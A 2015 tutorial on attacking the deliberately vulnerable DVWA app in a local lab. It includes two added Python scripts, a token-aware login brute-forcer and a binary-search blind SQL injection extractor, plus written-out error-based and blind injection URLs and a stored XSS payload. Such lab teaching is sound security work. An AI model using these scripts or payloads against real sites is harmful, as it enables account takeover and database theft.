The Practice of Web Application Penetration Testing
2015-02-06

1. Building a Testing Environment

Intruding into websites is illegal in many countries, so you cannot take other people's websites as your testing target.

First, you need to build a test environment for yourself. If you are not good at building servers, we recommend building a simple one with XAMPP. Keep this lab machine off untrusted networks: everything installed below is deliberately vulnerable.

OS: Windows 7, 8

Software: XAMPP for Windows, download: https://www.apachefriends.org/zh_cn/index.html

XAMPP for Windows bundles modules such as Apache, PHP, Tomcat and MySQL.

The default installation path is c:\xampp; please do not change it, because the paths below assume it.

Take DVWA (Damn Vulnerable Web Application) as an example. Start Apache and MySQL, and access http://127.0.0.1.

After they have started, use the following command to set the MySQL root password to 123456 (XAMPP's root account has no password after installation; 123456 is a weak password used only for this example, so please change it):

C:\xampp\mysql\bin\mysqladmin -u root password 123456

Now you can download DVWA from https://github.com/RandomStorm/DVWA and unzip it to C:\xampp\htdocs\dvwa.

Then modify its configuration file, C:\xampp\htdocs\dvwa\config\config.inc.php, so that it matches the database you just set up:

$_DVWA['db_server'] = 'localhost';
$_DVWA['db_database'] = 'dvwa';
$_DVWA['db_user'] = 'root';
$_DVWA['db_password'] = '123456';
$_DVWA['default_security_level'] = 'low';

Open http://127.0.0.1/dvwa/setup.php and click "Create / Reset Database" to finish the installation.

Access its front page and it will redirect to http://127.0.0.1/dvwa/login.php.

Now a basic test environment is available.

2. DVWA Brute Force

The first challenge of DVWA is how to log in. Usually you can search the network for the default username/password, or try SQL injection to bypass the authentication mechanism, for example with a username like admin';-- , or other ways.

Here we will use brute force, with WebCruiser Web Vulnerability Scanner 3 (http://www.janusec.com/) as the brute-force tool.

First, input any username and password, such as 123 and 456, and submit.

Switch to the Resend tab.

There is a request list that includes the request we just submitted.

Note the "Bruter" button: click it and the tool switches to the Bruter view. The username and password fields have been identified automatically from the captured request. The dictionary files are located in the same directory as WebCruiserWVS.exe and can be modified to suit the target.

Click "Go" to start the guessing process; results are listed in the window.

Log in with the username and password that were found.
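The same dictionary attack driven from code instead of the WebCruiser GUI, as an added example that is not part of the original article. It assumes DVWA's login form (fields username, password and Login posted to login.php; a correct pair is answered with a redirect to index.php, a wrong one with a redirect back to login.php) and, for newer DVWA releases, the hidden per-session user_token field, which it reads from the form before each attempt. The word lists and the fake_dvwa stand-in server are constructed here so the loop can be exercised offline.

```python
"""Dictionary attack on a DVWA-style login form (added example, not from the
article). Transport and success rule are pluggable so the same loop can be
pointed at a live server or at the constructed fake below."""
import itertools
import re
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar
from typing import Callable, Optional, Tuple

# Constructed word lists; WebCruiser reads these from its dictionary files.
USERNAMES = ["root", "admin", "test"]
PASSWORDS = ["123456", "admin", "password", "letmein"]

Response = Tuple[int, str, str]               # (status, Location header, body)
Transport = Callable[[str, dict], Response]   # POST url, form -> Response


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: the Location header is the success signal we want to see."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def make_http_transport() -> Tuple[Transport, Callable[[str], str]]:
    """Returns (post, get) sharing one cookie jar so the PHPSESSID persists."""
    opener = urllib.request.build_opener(
        _NoRedirect(), urllib.request.HTTPCookieProcessor(CookieJar()))

    def fetch(url: str, data: Optional[bytes] = None) -> Response:
        try:
            with opener.open(url, data=data, timeout=10) as resp:
                return resp.status, resp.headers.get("Location", ""), resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:  # with redirects disabled, a 302 lands here
            return err.code, err.headers.get("Location", ""), err.read().decode("utf-8", "replace")

    def post(url: str, form: dict) -> Response:
        return fetch(url, urllib.parse.urlencode(form).encode())

    def get(url: str) -> str:
        return fetch(url)[2]

    return post, get


def extract_token(html: str) -> Optional[str]:
    """Hidden CSRF field (user_token) that later DVWA versions add to the login form."""
    m = re.search(r"user_token\W+value=['\"]([^'\"]+)", html)
    return m.group(1) if m else None


def dvwa_success(status: int, location: str, body: str) -> bool:
    """DVWA answers a good login with a redirect to index.php, a bad one with login.php."""
    return status in (301, 302, 303) and "index.php" in location and "login.php" not in location


def brute_force(login_url: str, usernames, passwords, post: Transport,
                get: Optional[Callable[[str], str]] = None, is_success=dvwa_success):
    """Try every username/password pair; returns (user, password, attempts) or None."""
    attempts = 0
    for user, pw in itertools.product(usernames, passwords):
        form = {"username": user, "password": pw, "Login": "Login"}
        if get is not None:                      # fetch a fresh token when the form uses one
            token = extract_token(get(login_url))
            if token:
                form["user_token"] = token
        attempts += 1
        if is_success(*post(login_url, form)):
            return user, pw, attempts
    return None


def fake_dvwa(valid=("admin", "password")):
    """Constructed stand-in for the server: hands out a token on GET and accepts
    only the right pair together with that token. Lets the loop run offline."""
    state = {"token": None}

    def get(url: str) -> str:
        state["token"] = "deadbeef"              # a real server would randomise this
        return f"<input type='hidden' name='user_token' value='{state['token']}' />"

    def post(url: str, form: dict) -> Response:
        if form.get("user_token") != state["token"]:
            return 302, "login.php", ""
        if (form["username"], form["password"]) == valid:
            return 302, "index.php", ""
        return 302, "login.php", ""

    return post, get


if __name__ == "__main__":
    post, get = make_http_transport()
    print(brute_force("http://127.0.0.1/dvwa/login.php", USERNAMES, PASSWORDS, post, get))
```

Against a live DVWA the success rule is the redirect target, not the body text, because both outcomes are redirects; if your target answers differently, replace dvwa_success with a rule derived from a known-bad attempt, exactly as WebCruiser does when it diffs responses.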

3. SQL Injection

Select the "SQL Injection" menu, input 1 and submit.

Now input 1' to try.

MySQL throws an error because of the unpaired single quote. Now we can suspect that there is a SQL injection vulnerability here.

Continue by trying 1 and 1=1 and 1 and 1=2.

The results are not as expected (both inputs behave the same), so integer-type SQL injection is ruled out.

Continue with 1' and '1'='1 and 1' and '1'='2.

No result is returned when we input 1' and '1'='2.

So far we can judge that there is a string-type SQL injection vulnerability here.

Recap: criterion of SQL injection

Assume the initial response is Response0,
the response after appending true logic is Response1,
the response after appending false logic is Response2.
If Response1 = Response0 but Response1 != Response2, SQL injection exists.
Compare only the stable part of each response: session tokens, timestamps or other per-request content will make Response1 differ from Response0 even when the injection works.

OK, can you take over some data by exploiting it?

Try:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from (select count(*), concat((select database()), 0x3a, floor(rand(0)*2)) x from information_schema.tables group by x) a)%23

The database name "dvwa" is returned on the page.

This case is a little complex: it provokes a MySQL error on purpose. floor(rand(0)*2) is evaluated more than once per row while MySQL fills the temporary table for the GROUP BY, so the same group key is inserted twice and the query aborts with a duplicate-entry error. Because the key is concat(database(), ':', ...) (0x3a is ':'), the database name appears inside the error message that DVWA echoes to the page. %23 is the URL-encoded #, which comments out the rest of the original query.

Another way is blind SQL injection: guessing the length of the field and then the ASCII value of each byte of it.

To test whether the length of the database name is greater than 10:

http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))>10 and '1'='1

Wrong; try less than 10:

http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))<10 and '1'='1

Right; continue guessing until:

http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))=4 and '1'='1

We got it: the length is 4.

Continue to guess each byte (%27 below is the URL-encoded single quote, so %271%27=%271 is '1'='1):

http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),1,1)))=100 and %271%27=%271

The ASCII code of the first byte is 100, which is "d", and so on:

http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),2,1)))=118 and %271%27=%271 , the second byte is "v".

http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),3,1)))=119 and %271%27=%271 , the third byte is "w".

http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),4,1)))=97 and %271%27=%271 , the fourth byte is "a".

We got the full name of the database: "dvwa".
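The detection criterion and the blind extraction above, automated, as an added example that is not code from the article (which guesses by hand and then uses WebCruiser). It generalises the article's linear guessing to a binary search over the length and over each byte, and all it needs from the target is an oracle: a function that injects a SQL condition into the vulnerable parameter and reports whether the page equals Response0. To run offline, the vulnerable page is simulated with an in-memory SQLite copy of DVWA's low-security query (the rows, build_db and vulnerable_page are constructed here, modelled on DVWA's users table); http_page is the assumed live-target variant you would swap in, and the function names default to MySQL's char_length/ord because SQLite spells them length/unicode.

```python
"""Boolean-based blind SQL injection, automated (added example, not from the article).
Offline run: the DVWA query is simulated on SQLite. Live run: replace the page
function with http_page and use the MySQL function names."""
import sqlite3
import urllib.parse
import urllib.request
from typing import Callable

# DVWA "low" source: $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"
VULNERABLE_QUERY = "SELECT first_name, last_name FROM users WHERE user_id = '{id}'"

Page = Callable[[str], str]       # id value -> response body
Oracle = Callable[[str], bool]    # SQL condition -> did the "true" page come back?


def build_db() -> sqlite3.Connection:
    """Constructed sample data; password hashes are MD5s, as DVWA stores them."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
        (2, "Gordon", "Brown", "e99a18c4428cb38d5f260853678922e3"),
    ])
    return db


def vulnerable_page(db: sqlite3.Connection, id_value: str) -> str:
    """Mimics the PHP: the parameter is concatenated straight into the SQL."""
    try:
        rows = db.execute(VULNERABLE_QUERY.format(id=id_value)).fetchall()
    except sqlite3.Error as err:
        return f"ERROR: {err}"   # the unpaired-quote error the article sees for id=1'
    return "".join(f"First name: {fn}<br />Surname: {ln}<br />" for fn, ln in rows)


def http_page(id_value: str, url="http://127.0.0.1/dvwa/vulnerabilities/sqli/", cookie="") -> str:
    """Live-target variant (assumed, untested here): needs the PHPSESSID and security=low
    cookies of a logged-in session. Strip per-request content (tokens, timestamps) from the
    body before comparing responses, or the criterion below gives false negatives."""
    query = urllib.parse.urlencode({"id": id_value, "Submit": "Submit"})
    req = urllib.request.Request(f"{url}?{query}", headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def detect_injection(page: Page, true_payload: str, false_payload: str, base: str = "1") -> bool:
    """The article's criterion: Response1 == Response0 and Response1 != Response2."""
    r0, r1, r2 = page(base), page(true_payload), page(false_payload)
    return r1 == r0 and r1 != r2


def make_oracle(page: Page, base: str = "1") -> Oracle:
    """Wrap a condition in the string-type payload  1' and (...) and '1'='1  ."""
    r0 = page(base)
    return lambda cond: page(f"{base}' and ({cond}) and '1'='1") == r0


def _bsearch(oracle: Oracle, greater_than: Callable[[int], str], hi: int) -> int:
    """Smallest n in [0, hi] for which 'value > n' is false, i.e. the value itself."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(greater_than(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle: Oracle, expr: str, length_fn="char_length", ord_fn="ord", max_len=64) -> str:
    """Recover the string value of a SQL expression byte by byte: about 6 requests for the
    length and 8 per byte instead of one per candidate. Assumes single-byte (ASCII) content,
    as the article does. MySQL: char_length/ord (defaults); SQLite: length/unicode."""
    length = _bsearch(oracle, lambda n: f"{length_fn}({expr}) > {n}", max_len)
    return "".join(
        chr(_bsearch(oracle, lambda n, i=i: f"{ord_fn}(substr({expr},{i},1)) > {n}", 255))
        for i in range(1, length + 1)
    )


if __name__ == "__main__":
    db = build_db()
    page = lambda v: vulnerable_page(db, v)
    print("string injection:", detect_injection(page, "1' and '1'='1", "1' and '1'='2"))
    print("integer injection:", detect_injection(page, "1 and 1=1", "1 and 1=2"))
    oracle = make_oracle(page)
    print(extract(oracle, "(select password from users where user_id=1)", "length", "unicode"))
```

Against the real DVWA the article's case is extract(oracle, "database()") with the MySQL defaults; any other expression the injected user can read, such as the admin password hash above, is pulled out the same way. The integer-type probe comes back false on both engines even though they cast '1 and 1=1' differently: MySQL keeps the leading 1 and returns the row for both payloads, SQLite returns nothing for both, and in neither case does Response1 differ from Response2.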

Is there a tool that can do these tests for us?

Yes, a web application security scanner can do it.

Take WebCruiser as an illustration: navigate to the page and click "Scan URL".

SQL injection vulnerabilities are found. Right-click the vulnerability and select "SQL INJECTION POC", then click "Get Environment Information".

4. XSS

Select XSS from the menu (this one is the stored XSS page):

http://127.0.0.1/dvwa/vulnerabilities/xss_s/

Input text and a script tag directly into the title and content fields, for example test<script>alert(1)</script>. Because the message is stored and re-rendered unescaped for every visitor, the script runs each time the page is viewed.

Or use the scanner: it found 2 XSS vulnerabilities.

Note: to improve efficiency, WebCruiser Web Vulnerability Scanner can scan a designated vulnerability type (Setting) or a designated URL (Scan URL button) separately.


